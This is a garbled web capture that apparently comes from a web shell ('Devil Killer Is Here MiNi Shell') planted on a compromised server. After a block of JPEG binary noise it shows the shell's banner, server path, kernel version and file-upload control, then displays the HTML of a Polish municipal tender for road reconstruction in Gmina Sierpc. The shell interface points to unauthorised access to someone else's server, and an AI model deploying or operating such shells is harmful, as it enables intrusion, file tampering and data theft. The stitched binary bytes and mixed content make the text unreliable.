JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230120/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230120/0004858201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg na terenie gminy Sierpc” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sierpc</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Biskupa Floriana 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sierpc</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 275 23 31</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 275 57 01 w. 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gmina.sierpc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg na terenie gminy Sierpc” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1aa8a742-9896-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00048582</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00045378/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dróg na terenie gminy Sierpc</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1aa8a742-9896-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu: Platformy e-Zamówienia.<br/>2. Komunikacja za Pomocą platformy e-Zamówienia:<br/>2.1. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio <br/> do widoku postępowania na Platformie e-Zamówienia:<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-1aa8a742-9896-11ed-94da-6ae0fe5e7159<br/>2.2. Sposób komunikowania się za pośrednictwem Platformy e-Zamówienia został opisany pod <br/> adresem: https://ezamowienia.gov.pl<br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy <br/> i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza <br/> komunikację za pomocą (nie dotyczy składania ofert):<br/> - Elektronicznej Skrzynki Podawczej ePUAPu Urzędu Gminy w Sierpcu pod adresem:<br/> /3f4ih06ymt/SkrytkaESP<br/> - poczty elektronicznej na adres e-mail: architektura@gmina.sierpc.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania <br/> konta na Platformie e-Zamówienia ani logowania.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/> publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/> Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania <br/> z Platformy e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie <br/> internetowej https://ezamowienia.gov.pl oraz zamieszczone w zakładce „Centrum pomocy”.<br/>3. Komunikacja w postępowaniu, przy użyciu platformy e-Zamówienia, z wyłączeniem składania <br/> ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych <br/> w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy <br/> do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie <br/> pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie <br/> załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>4. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady <br/> Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym <br/> podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, <br/> zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie <br/> zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. <br/> W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się <br/> uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub <br/> dokument z wszytym podpisem (typ wewnętrzny).<br/>5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie <br/> wymaga posiadania konta „Wykonawca” na Platformie e-Zamówienia oraz zalogowania się <br/> na Platformie e – Zamówienia. Do korzystania z „Formularzy do komunikacji” służących <br/> do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności <br/> SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są <br/> po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” <br/> wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego <br/> formularza).<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług <br/> Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin <br/> Platformy e-Zamówienia.<br/>9. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy <br/> e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod <br/> numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony <br/> na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>10. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących <br/> kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być <br/> zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów <br/> w sprawie wymagań dla dokumentów elektronicznych.<br/>11. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy PZP ww. regulacje nie będą miały <br/> bezpośredniego zastosowania. <br/>12. Zamawiający zaleca sporządzanie dokumentów elektronicznych w formacie .pdf</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informujemy, że:<br/>1.1. administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy <br/> w Sierpcu jest Wójt Gminy Sierpc, ul. Biskupa Floriana 4, 09-200 Sierpc; <br/>1.2. administrator – Wójt Gminy Sierpc wyznaczył Inspektora Danych Osobowych, z którym <br/> można się kontaktować pod numerem telefonu: (24) 275 57 01, adres e-mail: <br/> iod@gmina.sierpc.pl <br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym <br/> w trybie podstawowym na roboty budowlane pn. „Przebudowa dróg gminnych <br/> na terenie gminy Sierpc”.<br/>1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/> udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp; <br/>1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/> umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/> dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, <br/> związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/> konsekwencje niepodania określonych danych wynikają z ustawy pzp;<br/>1.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO. <br/>1.8. posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana <br/> danych osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora <br/> ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania <br/> postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, <br/> o których mowa w art. 18 ust. 2 RODO; d) prawo do wniesienia skargi do Prezesa <br/> Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych <br/> osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>1.9. nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do <br/> usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym <br/> mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec <br/> przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana <br/> danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>1.10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne <br/> z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem <br/> właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, <br/> ul. Stawki 2, 00-193 Warszawa.<br/>2. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym<br/> postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych<br/> wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu<br/> o udzielenie zamówienia. Do obowiązków tych należą:<br/>2.1. obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych,<br/> których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio<br/> pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych<br/> na żądanie zamawiającego,<br/>2.2. obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych,<br/> których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca<br/> przekazuje zamawiającemu w treści oferty lub dokumentów składanych <br/> na żądanie zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BI.272.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 4061208,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Nazwa nadana zamówieniu przez Zamawiającego:<br/>„Przebudowa dróg na terenie gminy Sierpc”<br/>o łącznej długości około 10 km.<br/>w ramach Rządowego Funduszu Polski Ład: Programu Inwestycji Strategicznych.<br/><br/>2. Przedmiot zamówienia należy zrealizować w formule „ZAPROJEKTUJ I WYBUDUJ”.<br/><br/>3. Zakres przedmiotu zamówienia, zgodnie z art. 103 ust.2 ustawy Pzp, został<br/>opisany za pomocą programu funkcjonalno – użytkowego /załączniki nr 12-15 do SWZ/.<br/><br/>4. W ramach przedmiotu zamówienia należy:<br/>4.1. Opracować dokumentację projektową wraz z uzyskaniem niezbędnych opinii, uzgodnień<br/>oraz przygotować materiały do dokonania w imieniu i na rzecz Zamawiającego właściwego<br/>zezwolenia na wykonania robót budowlanych oraz uzyskać inne decyzje<br/>administracyjnych niezbędnych do zrealizowania przedmiotowego zadania inwestycyjnego<br/>w oparciu o Program Funkcjonalno – Użytkowy (PFU) oraz odpowiednie przepisy prawa;<br/>4.2. Wykonać roboty budowlane w oparciu o dokumentację projektową opracowaną przez<br/>Wykonawcę, STWiORB oraz odpowiednie przepisy prawa.<br/><br/>5. Zakres projektu i robót budowlanych obejmuje:<br/>5.1. Zadanie 1: „Przebudowa drogi gminnej nr 370525W w m. Borkowo Kościelne ul. Sierpecka”.<br/>Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0007 Borkowo Kościelne<br/>Działki nr ewidencyjny: 137, 194, 115/3 i 58.<br/><br/>5.2. Zadanie 2: „Przebudowa drogi gminnej nr 370507W<br/>(Goleszyn – Grodkowo Włóki)”.<br/>Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0012 Goleszyn<br/>Działki nr ewidencyjny: 203, 204, 205 i 206.<br/><br/>5.3. Zadanie 3: „Przebudowa drogi wewnętrznej Białe Błoto – Grodkowo Zawisze - Gorzewo”.<br/>Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0001 Białe Błoto<br/>Działki nr ewidencyjny: 8 i 64<br/><br/>5.4. Zadanie 4: „Przebudowa drogi gminnej nr 370538W Piaski – Gorzewo”.<br/>Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0013 Gorzewo<br/>Działka nr ewidencyjny: 63<br/><br/><br/>5.5. Zadanie 5: „Przebudowa drogi gminnej nr 370536W relacji Dziembakowo<br/>– Warzyn Skóry”.<br/>Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0038 Warzyn Skóry<br/>Działki nr ewidencyjny: 9, 23/3, 23/2, 144/1 i<br/>177<br/><br/>5.6. Zadanie 6: „Przebudowa drogi gminnej nr 370510W od drogi powiatowej<br/>nr 3754W do granicy gminy Sierpc i Gozdowo”.<br/>1) Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0002 Białoskóry<br/>Działki nr ewidencyjny: 24, 129/4, 104 i 129/3<br/><br/>5.7. Zadanie 7: „Przebudowa drogi gminnej nr 370504W Borkowo Wielkie – granica<br/>gmin Sierpc i miasto Sierpc”.<br/>1) Miejsce wykonania przebudowy drogi: Gmina Sierpc (gmina wiejska)<br/>Obręb ewidencyjny 0008 Borkowo Wielkie<br/>Działki nr ewidencyjny: 25/1, 23 i 194 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45112730-1 - Roboty w zakresie kształtowania dróg i autostrad</p> <p class="mb-0">45221100-3 - Roboty budowlane w zakresie budowy mostów</p> <p class="mb-0">45231220-3 - Roboty budowlane w zakresie gazociągów</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <p class="mb-0">45233124-4 - Roboty budowlane w zakresie arterii drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się kryteriami oceny ofert:<br/>1) „Cena” (C) – waga kryterium 60 %;<br/>2) „Okres gwarancji i rękojmi” (GR) – waga kryterium 40 %<br/><br/>2. Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu<br/>zamówienia (łącznie dla wszystkich zadań), podanej przez Wykonawcę w formularzu oferty.<br/>Zamawiający przyzna punkty wg następującego wzoru:<br/><br/>Cena najniższa brutto*<br/>C = ------------------------------------- x 100 pkt x 60%<br/>Cena oferty ocenianej brutto<br/><br/><br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>3. Kryterium - „Okres gwarancji i rękojmi” będzie rozpatrywane na<br/>podstawie okresu gwarancji jakości i rękojmi na roboty objęte przedmiotem zamówienia,<br/>podanej przez Wykonawcę w formularzu oferty, punktowany będzie wg. poniższego<br/>schematu na podstawie wskazanego terminu w formularzu oferty:<br/>GR o – GR min<br/>GR = ------------------ x 100 pkt x 40%<br/>GR max – GR min<br/>Gdzie:<br/>GR max – gwarancja i rękojmia maksymalna (60 m-cy),<br/>GR min – gwarancja i rękojmia minimalna (36 m-cy),<br/>GR o – gwarancja i rękojmia oferty ocenianej (w miesiącach).<br/>Termin gwarancji i rękojmi należy proponować w pełnych miesiącach.<br/>UWAGA: Maksymalna liczba 40 punktów zostanie przyznana za udzielenie 60 m-cy lub<br/>dłuższej gwarancji i rękojmi na wykonany przedmiot zamówienia. W przypadku<br/>zaoferowania gwarancji i rękojmi dłuższej niż 60 m-cy, do oceny kryterium będzie brany<br/>okres gwarancji i rękojmi maksymalny.<br/><br/>Minimalny okres gwarancji jakości rękojmi dla robót budowlanych – 36 m-cy. Zaoferowanie krótszego okresu gwarancji spowoduje odrzucenie oferty. Jeżeli Wykonawca nie wypełni zobowiązania dotyczącego okresu gwarancji i rękojmi, Zamawiający uzna, że okres gwarancji i rękojmi został udzielony na 36 miesięcy. Każdy kolejny miesiąc nie spowoduje zwiększenia ilości przyznanych punktów.<br/><br/>4. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących<br/>sumę punktów przyznanych w każdym kryterium z uwzględnieniem wagi procentowej<br/>danego kryterium, obliczonych wg wzoru:<br/>P = C + GR<br/>gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „Cena”,<br/>G – liczba punktów przyznana ofercie ocenianej w kryterium „Okres Gwarancji i Rękojmi”<br/>P – łączna liczba punktów przyznana ofercie ocenianej<br/><br/>5. Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj 